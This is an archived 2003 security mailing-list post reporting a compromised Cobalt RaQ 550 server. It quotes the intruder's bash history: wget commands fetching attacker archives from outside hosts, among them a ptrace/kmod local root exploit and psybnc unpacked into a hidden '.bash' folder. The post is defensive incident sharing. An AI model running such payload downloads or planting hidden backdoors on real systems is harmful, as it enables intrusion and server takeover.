Open Source and information security mailing list archives
 
Message-ID: <CD58EFC8-F866-11D7-9171-0003939CDB32@code511.com>
From: adf at code511.com (adf--at--Code511.com)
Subject: raq 550 compromised

Sorry for the "cross-post", I just saw this message on the cobalt-security
mailing list today:

A user got his raq 550 compromised and he posted some bash history he
found:

-wget www.ps-lov.us/pizda.tgz
:unknown binaries (yet?) named "mumu"

-wget snow.prohosting.com/muiemuie/p.tar.gz
:Linux kernel ptrace/kmod local root exploit from ipsec

-wget snow.prohosting.com/muiemuie/p.tgz
: it will decompress psybnc in a hidden folder (.bash)

-wget snow.prohosting.com/muiemuie/km3.tgz ----->(file offline)
-wget 65.113.119.133/muiemuie/km3.tgz	  ----->(file offline)


Anyone seen pizda or mumu?

If you are interested in all details of the post:
http://list.cobalt.com/pipermail/cobalt-security/2003-October/008607.html

-deepquest

